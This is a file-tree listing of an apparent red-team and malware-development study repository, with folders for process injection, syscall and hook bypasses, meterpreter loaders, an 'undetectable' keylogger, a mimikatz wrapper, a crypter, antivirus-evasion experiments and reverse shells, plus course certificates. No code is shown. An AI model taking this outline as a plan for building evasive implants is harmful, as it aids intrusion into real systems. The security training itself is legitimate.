├── Assembly
├── Linx86-64
│ ├── Readme.md
│ ├── call_program
│ │ ├── call_me
│ │ ├── call_me.asm
│ │ ├── call_me.assembly
│ │ └── call_me.o
│ ├── execve
│ │ ├── Readme.md
│ │ ├── beautify.py
│ │ ├── call_me
│ │ ├── call_me.asm
│ │ ├── call_me.assembly
│ │ ├── call_me.o
│ │ ├── call_me.so
│ │ ├── dump.txt
│ │ ├── system.bin
│ │ ├── system.c
│ │ └── system_O3.bin
│ ├── fork_execve
│ │ ├── Readme.md
│ │ ├── beautify.py
│ │ ├── call_me
│ │ ├── call_me.asm
│ │ ├── call_me.assembly
│ │ ├── call_me.o
│ │ ├── dump.txt
│ │ ├── how-to
│ │ ├── system.bin
│ │ ├── system.c
│ │ └── useful.txt
│ ├── fork_execve_shell
│ │ ├── Readme.md
│ │ ├── beautify.py
│ │ ├── call_me
│ │ ├── call_me.asm
│ │ ├── call_me.assembly
│ │ ├── call_me.o
│ │ ├── dump.txt
│ │ ├── how-to
│ │ ├── system.bin
│ │ ├── system.c
│ │ └── useful.txt
│ ├── hello_world
│ │ ├── hello
│ │ ├── hello.o
│ │ └── hello_world.asm
│ ├── print_args
│ │ ├── print_args
│ │ ├── print_args.asm
│ │ ├── print_args.assembly
│ │ └── print_args.o
│ └── push_ret
│ │ ├── test
│ │ ├── test.asm
│ │ ├── test.assembly
│ │ ├── test.bin
│ │ └── test.o
├── Readme.md
├── Winx32
│ ├── Readme.md
│ ├── hellow.asm
│ ├── hellow.exe
│ ├── hellow.lst
│ └── hellow.obj
└── Winx64
│ ├── Readme.md
│ ├── asm_1
│ ├── hello-win.asm
│ ├── hello-win.exe
│ ├── hello-win.obj
│ ├── hello64.asm
│ ├── hello64.fas
│ ├── hello64.lst
│ ├── hello64.obj
│ ├── make
│ ├── test.exe
│ └── test64.exe
│ ├── asm_2
│ ├── hello.asm
│ ├── hello.exe
│ ├── hello.lst
│ ├── hello_new.assembly
│ ├── hello_new.exe
│ └── hello_new.obj
│ ├── call_stack
│ ├── Readme.md
│ ├── main_clean.cpp
│ ├── main_clean.exe
│ ├── main_dirty.cpp
│ ├── payload.asm
│ └── ramp.asm
│ └── payloads
│ ├── 1.popcalc
│ ├── popcalc.asm
│ ├── popcalc.exe
│ └── popcalc.o
│ ├── 2.cmd
│ ├── new_cmd.asm
│ ├── new_cmd.exe
│ └── new_cmd.o
│ ├── 3.powershell_multi_command
│ ├── new_powershell.asm
│ ├── new_powershell.exe
│ └── new_powershell.o
│ ├── 4.changable_api
│ ├── Readme.md
│ ├── any_api.asm
│ ├── any_api.exe
│ └── any_api.o
│ ├── 5.ZeroTotal
│ ├── Readme.md
│ └── calc
│ │ └── calc_binja.bin
│ ├── 6.meterpreter
│ ├── Readme.md
│ └── meterpreter_stageless.bin
│ └── Readme.md
├── C#
├── CreateProcess
│ ├── CreateProcess.sln
│ ├── CreateProcess
│ │ ├── CreateProcess.csproj
│ │ ├── Program.cs
│ │ ├── bin
│ │ │ └── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ ├── CreateProcess.deps.json
│ │ │ │ ├── CreateProcess.dll
│ │ │ │ ├── CreateProcess.exe
│ │ │ │ ├── CreateProcess.pdb
│ │ │ │ ├── CreateProcess.runtimeconfig.dev.json
│ │ │ │ └── CreateProcess.runtimeconfig.json
│ │ └── obj
│ │ │ ├── CreateProcess.csproj.nuget.dgspec.json
│ │ │ ├── CreateProcess.csproj.nuget.g.props
│ │ │ ├── CreateProcess.csproj.nuget.g.targets
│ │ │ ├── Debug
│ │ │ └── netcoreapp3.1
│ │ │ │ ├── CreateProcess.AssemblyInfo.cs
│ │ │ │ ├── CreateProcess.AssemblyInfoInputs.cache
│ │ │ │ ├── CreateProcess.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── CreateProcess.assets.cache
│ │ │ │ ├── CreateProcess.csproj.AssemblyReference.cache
│ │ │ │ ├── CreateProcess.csproj.CoreCompileInputs.cache
│ │ │ │ ├── CreateProcess.csproj.FileListAbsolute.txt
│ │ │ │ ├── CreateProcess.dll
│ │ │ │ ├── CreateProcess.genruntimeconfig.cache
│ │ │ │ ├── CreateProcess.pdb
│ │ │ │ └── apphost.exe
│ │ │ ├── project.assets.json
│ │ │ └── project.nuget.cache
│ └── Readme.md
├── DInvoke
│ ├── CreateProcess_DInvoke
│ │ ├── ConsoleApp1
│ │ │ ├── ConsoleApp1.sln
│ │ │ └── ConsoleApp1
│ │ │ │ ├── ConsoleApp1.csproj
│ │ │ │ ├── Program.cs
│ │ │ │ ├── bin
│ │ │ │ └── Debug
│ │ │ │ │ └── netcoreapp3.1
│ │ │ │ │ ├── ConsoleApp1.deps.json
│ │ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ │ ├── ConsoleApp1.exe
│ │ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json
│ │ │ │ │ ├── ConsoleApp1.runtimeconfig.json
│ │ │ │ │ ├── DInvoke.dll
│ │ │ │ │ └── DInvoke.pdb
│ │ │ │ └── obj
│ │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json
│ │ │ │ ├── ConsoleApp1.csproj.nuget.g.props
│ │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets
│ │ │ │ ├── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs
│ │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache
│ │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ │ ├── ConsoleApp1.assets.cache
│ │ │ │ │ ├── ConsoleApp1.csproj.AssemblyReference.cache
│ │ │ │ │ ├── ConsoleApp1.csproj.CopyComplete
│ │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache
│ │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt
│ │ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache
│ │ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ │ └── apphost.exe
│ │ │ │ ├── project.assets.json
│ │ │ │ └── project.nuget.cache
│ │ └── Readme.md
│ ├── MessageBoxW_DIvoke
│ │ ├── MessageBoxW_DIvoke.sln
│ │ └── MessageBoxW_DIvoke
│ │ │ ├── MessageBoxW_DInvoke.csproj
│ │ │ ├── Program.cs
│ │ │ ├── bin
│ │ │ └── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ ├── DInvoke.dll
│ │ │ │ ├── DInvoke.pdb
│ │ │ │ ├── MessageBoxW_DInvoke.deps.json
│ │ │ │ ├── MessageBoxW_DInvoke.dll
│ │ │ │ ├── MessageBoxW_DInvoke.exe
│ │ │ │ ├── MessageBoxW_DInvoke.pdb
│ │ │ │ ├── MessageBoxW_DInvoke.runtimeconfig.dev.json
│ │ │ │ └── MessageBoxW_DInvoke.runtimeconfig.json
│ │ │ └── obj
│ │ │ ├── Debug
│ │ │ └── netcoreapp3.1
│ │ │ │ ├── DInvoke.dll
│ │ │ │ ├── MessageBoxW_DInvoke.AssemblyInfo.cs
│ │ │ │ ├── MessageBoxW_DInvoke.AssemblyInfoInputs.cache
│ │ │ │ ├── MessageBoxW_DInvoke.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── MessageBoxW_DInvoke.assets.cache
│ │ │ │ ├── MessageBoxW_DInvoke.csproj.AssemblyReference.cache
│ │ │ │ ├── MessageBoxW_DInvoke.csproj.CopyComplete
│ │ │ │ ├── MessageBoxW_DInvoke.csproj.CoreCompileInputs.cache
│ │ │ │ ├── MessageBoxW_DInvoke.csproj.FileListAbsolute.txt
│ │ │ │ ├── MessageBoxW_DInvoke.dll
│ │ │ │ ├── MessageBoxW_DInvoke.genruntimeconfig.cache
│ │ │ │ ├── MessageBoxW_DInvoke.pdb
│ │ │ │ ├── MessageBoxW_DIvoke.AssemblyInfo.cs
│ │ │ │ ├── MessageBoxW_DIvoke.AssemblyInfoInputs.cache
│ │ │ │ ├── MessageBoxW_DIvoke.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── MessageBoxW_DIvoke.assets.cache
│ │ │ │ ├── MessageBoxW_DIvoke.csproj.AssemblyReference.cache
│ │ │ │ └── apphost.exe
│ │ │ ├── MessageBoxW_DInvoke.csproj.nuget.dgspec.json
│ │ │ ├── MessageBoxW_DInvoke.csproj.nuget.g.props
│ │ │ ├── MessageBoxW_DInvoke.csproj.nuget.g.targets
│ │ │ ├── MessageBoxW_DIvoke.csproj.nuget.dgspec.json
│ │ │ ├── MessageBoxW_DIvoke.csproj.nuget.g.props
│ │ │ ├── MessageBoxW_DIvoke.csproj.nuget.g.targets
│ │ │ ├── project.assets.json
│ │ │ └── project.nuget.cache
│ ├── Readme.md
│ └── Syscalls_DInvoke
│ │ ├── ConsoleApp1
│ │ ├── ConsoleApp1.sln
│ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.csproj
│ │ │ ├── Program.cs
│ │ │ ├── bin
│ │ │ └── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.deps.json
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.exe
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json
│ │ │ │ ├── ConsoleApp1.runtimeconfig.json
│ │ │ │ ├── DInvoke.dll
│ │ │ │ └── DInvoke.pdb
│ │ │ └── obj
│ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json
│ │ │ ├── ConsoleApp1.csproj.nuget.g.props
│ │ │ ├── ConsoleApp1.csproj.nuget.g.targets
│ │ │ ├── Debug
│ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs
│ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache
│ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── ConsoleApp1.assets.cache
│ │ │ │ ├── ConsoleApp1.csproj.AssemblyReference.cache
│ │ │ │ ├── ConsoleApp1.csproj.CopyComplete
│ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache
│ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ └── apphost.exe
│ │ │ ├── project.assets.json
│ │ │ └── project.nuget.cache
│ │ └── Readme.md
├── HookBypass
│ ├── ConsoleApp1
│ │ ├── ConsoleApp1.sln
│ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.csproj
│ │ │ ├── Program.cs
│ │ │ ├── bin
│ │ │ └── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.deps.json
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.exe
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json
│ │ │ │ ├── ConsoleApp1.runtimeconfig.json
│ │ │ │ ├── DInvoke.dll
│ │ │ │ └── DInvoke.pdb
│ │ │ └── obj
│ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json
│ │ │ ├── ConsoleApp1.csproj.nuget.g.props
│ │ │ ├── ConsoleApp1.csproj.nuget.g.targets
│ │ │ ├── Debug
│ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs
│ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache
│ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── ConsoleApp1.assets.cache
│ │ │ │ ├── ConsoleApp1.csproj.AssemblyReference.cache
│ │ │ │ ├── ConsoleApp1.csproj.CopyComplete
│ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache
│ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ └── apphost.exe
│ │ │ ├── project.assets.json
│ │ │ └── project.nuget.cache
│ └── Readme.md
├── Ordinal
│ ├── Readme.md
│ ├── message_box_ordinal.sln
│ └── message_box_ordinal
│ │ ├── Program.cs
│ │ ├── bin
│ │ └── Debug
│ │ │ └── netcoreapp3.1
│ │ │ ├── message_box_ordinal.deps.json
│ │ │ ├── message_box_ordinal.dll
│ │ │ ├── message_box_ordinal.exe
│ │ │ ├── message_box_ordinal.pdb
│ │ │ ├── message_box_ordinal.runtimeconfig.dev.json
│ │ │ └── message_box_ordinal.runtimeconfig.json
│ │ ├── message_box_ordinal.csproj
│ │ └── obj
│ │ ├── Debug
│ │ └── netcoreapp3.1
│ │ │ ├── apphost.exe
│ │ │ ├── message_box_ordinal.AssemblyInfo.cs
│ │ │ ├── message_box_ordinal.AssemblyInfoInputs.cache
│ │ │ ├── message_box_ordinal.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ ├── message_box_ordinal.assets.cache
│ │ │ ├── message_box_ordinal.csproj.CoreCompileInputs.cache
│ │ │ ├── message_box_ordinal.csproj.FileListAbsolute.txt
│ │ │ ├── message_box_ordinal.dll
│ │ │ ├── message_box_ordinal.genruntimeconfig.cache
│ │ │ └── message_box_ordinal.pdb
│ │ ├── message_box_ordinal.csproj.nuget.dgspec.json
│ │ ├── message_box_ordinal.csproj.nuget.g.props
│ │ ├── message_box_ordinal.csproj.nuget.g.targets
│ │ ├── project.assets.json
│ │ └── project.nuget.cache
├── PInvoke
│ ├── PInvoke.sln
│ ├── PInvoke
│ │ ├── PInvoke.csproj
│ │ ├── Program.cs
│ │ ├── bin
│ │ │ └── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ ├── PInvoke.deps.json
│ │ │ │ ├── PInvoke.dll
│ │ │ │ ├── PInvoke.exe
│ │ │ │ ├── PInvoke.pdb
│ │ │ │ ├── PInvoke.runtimeconfig.dev.json
│ │ │ │ └── PInvoke.runtimeconfig.json
│ │ └── obj
│ │ │ ├── Debug
│ │ │ └── netcoreapp3.1
│ │ │ │ ├── PInvoke.AssemblyInfo.cs
│ │ │ │ ├── PInvoke.AssemblyInfoInputs.cache
│ │ │ │ ├── PInvoke.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── PInvoke.assets.cache
│ │ │ │ ├── PInvoke.csproj.AssemblyReference.cache
│ │ │ │ ├── PInvoke.csproj.CoreCompileInputs.cache
│ │ │ │ ├── PInvoke.csproj.FileListAbsolute.txt
│ │ │ │ ├── PInvoke.dll
│ │ │ │ ├── PInvoke.genruntimeconfig.cache
│ │ │ │ ├── PInvoke.pdb
│ │ │ │ └── apphost.exe
│ │ │ ├── PInvoke.csproj.nuget.dgspec.json
│ │ │ ├── PInvoke.csproj.nuget.g.props
│ │ │ ├── PInvoke.csproj.nuget.g.targets
│ │ │ ├── project.assets.json
│ │ │ └── project.nuget.cache
│ └── Readme.md
├── ProcessInjection
│ ├── ProcessInjection_CreateRemoteThread
│ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.sln
│ │ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.csproj
│ │ │ ├── Program.cs
│ │ │ ├── bin
│ │ │ └── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.deps.json
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.exe
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json
│ │ │ │ └── ConsoleApp1.runtimeconfig.json
│ │ │ └── obj
│ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json
│ │ │ ├── ConsoleApp1.csproj.nuget.g.props
│ │ │ ├── ConsoleApp1.csproj.nuget.g.targets
│ │ │ ├── Debug
│ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs
│ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache
│ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── ConsoleApp1.assets.cache
│ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache
│ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ └── apphost.exe
│ │ │ ├── project.assets.json
│ │ │ └── project.nuget.cache
│ ├── ProcessInjection_CreateThread
│ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.sln
│ │ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.csproj
│ │ │ ├── Program.cs
│ │ │ ├── bin
│ │ │ └── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.deps.json
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.exe
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json
│ │ │ │ └── ConsoleApp1.runtimeconfig.json
│ │ │ └── obj
│ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json
│ │ │ ├── ConsoleApp1.csproj.nuget.g.props
│ │ │ ├── ConsoleApp1.csproj.nuget.g.targets
│ │ │ ├── Debug
│ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs
│ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache
│ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── ConsoleApp1.assets.cache
│ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache
│ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ └── apphost.exe
│ │ │ ├── project.assets.json
│ │ │ └── project.nuget.cache
│ ├── ProcessInjection_NtMapViewOfSection
│ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.sln
│ │ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.csproj
│ │ │ ├── Program.cs
│ │ │ ├── bin
│ │ │ └── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.deps.json
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.exe
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json
│ │ │ │ └── ConsoleApp1.runtimeconfig.json
│ │ │ └── obj
│ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json
│ │ │ ├── ConsoleApp1.csproj.nuget.g.props
│ │ │ ├── ConsoleApp1.csproj.nuget.g.targets
│ │ │ ├── Debug
│ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs
│ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache
│ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── ConsoleApp1.assets.cache
│ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache
│ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ └── apphost.exe
│ │ │ ├── project.assets.json
│ │ │ └── project.nuget.cache
│ ├── ProcessInjection_QueueUserAPC
│ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.sln
│ │ │ └── ConsoleApp1
│ │ │ ├── ConsoleApp1.csproj
│ │ │ ├── Program.cs
│ │ │ ├── bin
│ │ │ └── Debug
│ │ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.deps.json
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.exe
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json
│ │ │ │ └── ConsoleApp1.runtimeconfig.json
│ │ │ └── obj
│ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json
│ │ │ ├── ConsoleApp1.csproj.nuget.g.props
│ │ │ ├── ConsoleApp1.csproj.nuget.g.targets
│ │ │ ├── Debug
│ │ │ └── netcoreapp3.1
│ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs
│ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache
│ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig
│ │ │ │ ├── ConsoleApp1.assets.cache
│ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache
│ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt
│ │ │ │ ├── ConsoleApp1.dll
│ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache
│ │ │ │ ├── ConsoleApp1.pdb
│ │ │ │ └── apphost.exe
│ │ │ ├── project.assets.json
│ │ │ └── project.nuget.cache
│ └── Readme.md
└── Readme.md
├── C
├── Readme.md
├── code_exec
│ ├── Readme.md
│ ├── system.bin
│ └── system.c
├── custom_payload
│ ├── Readme.md
│ ├── beautify.py
│ ├── call_me
│ ├── call_me.asm
│ ├── call_me.assembly
│ ├── call_me.o
│ ├── call_me_2.bak
│ ├── dump.txt
│ ├── how-to
│ ├── system.bin
│ ├── system.c
│ └── useful.txt
├── meterpreter
│ ├── Readme.md
│ ├── meterpreter_re_me.exe
│ ├── meterpreter_re_me_x64.c
│ ├── meterpreter_re_me_x86.c
│ ├── patchmeup_meterpreter.c
│ └── patchmeup_meterpreter.exe
└── undetectable
│ ├── compile.bat
│ ├── keylogger.h
│ ├── undetectable.c
│ └── undetectable.exe
├── Certs
├── Certificate-Steve S.pdf
├── Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf
├── Malware Development Advanced - Vol.1-certificate.pdf
├── Malware Development Advanced - Vol.2-certificate.pdf
├── RTMLS_2024-06-14.pdf
├── Readme.md
├── Red-Team-Ops-Completion.jpg
├── Red-Team-Ops-II-Completion.jpg
├── Sektor7_Malware Development Essentials-certificate.pdf
├── Sektor7_Malware Development Intermediate-certificate.pdf
├── Sektor7_Windows Evasion-certificate.pdf
├── THM-JrPenTester.png
├── THM-Offensive_Pentesting.png
├── THM-Red_Team_Learning_Path.png
├── Udemy_Linux-PEAS.jpg
├── Udemy_RE-Exploit-Dev.jpg
├── Udemy_RE-Malware-Net-Java.jpg
├── Udemy_RE-Radare2.jpg
├── Udemy_RE-Windows-GUI.jpg
├── Udemy_Windows-PEAS.jpg
├── Udemy_build_undetectable_malware_in_c.jpg
├── VHL_Advanced+_Certificate.pdf
├── VHL_Basic_Certificate.pdf
├── ZPS_DevOps_For_Pentesters.jpg
└── zps_initial_access_cert.jpg
├── Cpp
├── BYOdll
│ ├── version1
│ │ ├── Readme.md
│ │ ├── beautify.py
│ │ ├── compile.bat
│ │ ├── implant.cpp
│ │ └── implant.exe
│ ├── version2
│ │ ├── Readme.md
│ │ ├── aesencrypt.py
│ │ ├── compile.bat
│ │ ├── implant.cpp
│ │ └── implant.exe
│ └── version3
│ │ ├── Readme.md
│ │ ├── compile.bat
│ │ └── implant.cpp
├── Readme.md
├── badAsm
│ ├── badAsm.exe
│ ├── badAsm.exe.stackdump
│ ├── badAsm_better.exe
│ ├── badAsm_rx.exe
│ ├── main.cpp
│ ├── main_better.cpp
│ └── main_rx.cpp
├── bad_fn_ptr
│ ├── bad_fn_ptr.sln
│ ├── bad_fn_ptr
│ │ ├── bad_fn_ptr.cpp
│ │ ├── bad_fn_ptr.vcxproj
│ │ ├── bad_fn_ptr.vcxproj.filters
│ │ ├── bad_fn_ptr.vcxproj.user
│ │ └── x64
│ │ │ └── Debug
│ │ │ ├── bad_fn_ptr.exe.recipe
│ │ │ ├── bad_fn_ptr.log
│ │ │ ├── bad_fn_ptr.obj
│ │ │ ├── bad_fn_ptr.tlog
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── bad_fn_ptr.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ ├── link.write.1.tlog
│ │ │ └── link.write.2u.tlog
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ └── x64
│ │ └── Debug
│ │ ├── bad_fn_ptr.exe
│ │ ├── bad_fn_ptr.exp
│ │ ├── bad_fn_ptr.lib
│ │ └── bad_fn_ptr.pdb
├── call_stack
│ ├── compile.bat
│ ├── main_clean.cpp
│ ├── main_clean.exe
│ ├── main_dirty.cpp
│ ├── main_dirty.exe
│ ├── payload.asm
│ ├── payload.o
│ ├── ramp.asm
│ └── ramp.o
├── clean_stacks
│ ├── baseline.cpp
│ ├── baseline.exe
│ ├── implant.cpp
│ ├── implant.exe
│ ├── implant_backup_1.cpp
│ ├── implant_backup_2.cpp
│ ├── payload.asm
│ ├── payload.o
│ ├── ramp.asm
│ └── ramp.o
├── create_process
│ ├── CreateProcess.cpp
│ ├── CreateProcess.exe
│ └── Readme.md
├── crypter
│ ├── compile.bat
│ ├── crypter.exe
│ ├── main.cpp
│ ├── main.obj
│ ├── out.txt
│ └── test.txt
├── deceiving_defender
│ ├── BigStackBypass
│ │ ├── build_the_sleigh.py
│ │ ├── compile.bat
│ │ ├── implant.cpp
│ │ ├── implant.exe
│ │ ├── meterpreter
│ │ │ ├── Readme.md
│ │ │ ├── beautify.py
│ │ │ ├── build_the_sleigh.py
│ │ │ ├── compile.bat
│ │ │ └── implant.cpp
│ │ ├── sleight.txt
│ │ ├── vt-results-2022-12-28.png
│ │ ├── vt_results.txt
│ │ └── windows-wallpaper.jpg
│ ├── Readme.md
│ ├── name_bypass
│ │ ├── Readme.md
│ │ ├── compile.bat
│ │ ├── implant.cpp
│ │ └── implant.exe
│ └── one
│ │ ├── compile.bat
│ │ ├── implant.cpp
│ │ ├── implant.exe
│ │ └── implant.obj
├── embedding_payloads
│ ├── Readme.md
│ ├── x64
│ │ ├── calc_x64.bin
│ │ ├── compile.bat
│ │ ├── even_better_x64.exe
│ │ ├── even_better_x64_PATCHED.exe
│ │ ├── even_better_x64_PATCHED_goto_MAIN.exe
│ │ ├── even_better_x64_reloc.exe
│ │ ├── good.cpp
│ │ ├── good_x64.exe
│ │ └── test.c
│ └── x86
│ │ ├── calc_payload_32.bin
│ │ ├── compile.bat
│ │ ├── even_better.exe
│ │ ├── even_better_ansi.exe
│ │ ├── good.cpp
│ │ ├── good.exe
│ │ ├── good.obj
│ │ ├── good_no_names.exe
│ │ ├── good_w_names.exe
│ │ ├── x86_broken_log.txt
│ │ └── x86_working_log.txt
├── hidden_mimikatz
│ ├── Readme.md
│ ├── mimikatz.exe
│ └── wrapper
│ │ ├── aesencrypt.py
│ │ ├── compile.bat
│ │ ├── favicon.ico
│ │ ├── mimikatz.cpp
│ │ ├── mimikatz.exe
│ │ ├── mimikatz.obj
│ │ ├── resources.h
│ │ ├── resources.o
│ │ ├── resources.rc
│ │ ├── resources.res
│ │ └── shellcode.bin
├── making_malware
│ ├── Readme.md
│ ├── implantv1
│ │ ├── beautify.py
│ │ ├── compile.bat
│ │ ├── implant.obj
│ │ ├── implantv1.cpp
│ │ ├── implantv1.exe
│ │ ├── implantv1.obj
│ │ └── xorencrypt.py
│ ├── implantv2
│ │ ├── aesencrypt.py
│ │ ├── compile.bat
│ │ ├── implant.exe
│ │ ├── implantv2.cpp
│ │ ├── implantv2.cpp.bak
│ │ ├── implantv2.obj
│ │ ├── reverseDLL.bin
│ │ ├── reverseDLL.txt
│ │ └── reverseDLL
│ │ │ ├── Python
│ │ │ ├── ConvertToShellcode.py
│ │ │ ├── Python.pyproj
│ │ │ ├── ShellcodeRDI.py
│ │ │ ├── ShellcodeRDI.pyc
│ │ │ ├── __pycache__
│ │ │ │ ├── ShellcodeRDI.cpython-311.pyc
│ │ │ │ └── ShellcodeRDI.cpython-38.pyc
│ │ │ └── reverseDLL.txt
│ │ │ ├── compileDLL.bat
│ │ │ ├── reverse.bin
│ │ │ ├── reverse.dll
│ │ │ ├── reverseDLL.bin
│ │ │ └── reverseDLL.cpp
│ ├── implantv3
│ │ ├── Main.cpp
│ │ ├── Readme.md
│ │ └── x64
│ │ │ └── Release
│ │ │ ├── implant.exe
│ │ │ └── implantv3.pdb
│ ├── misc
│ │ ├── mm#1
│ │ │ └── Main.cpp
│ │ ├── mm#2
│ │ │ ├── Main.cpp
│ │ │ └── Readme.md
│ │ └── readme.md
│ └── revshell
│ │ ├── beautify.py
│ │ ├── compile.bat
│ │ ├── payload.out
│ │ ├── reverse.cpp
│ │ ├── reverse.exe
│ │ ├── reverse.obj
│ │ ├── reverseDLL.bin
│ │ ├── reverseDLL.txt
│ │ ├── reverseDLL
│ │ ├── Python
│ │ │ ├── ConvertToShellcode.py
│ │ │ ├── Python.pyproj
│ │ │ ├── ShellcodeRDI.py
│ │ │ ├── ShellcodeRDI.pyc
│ │ │ ├── __pycache__
│ │ │ │ ├── ShellcodeRDI.cpython-311.pyc
│ │ │ │ └── ShellcodeRDI.cpython-38.pyc
│ │ │ └── reverseDLL.txt
│ │ ├── compileDLL.bat
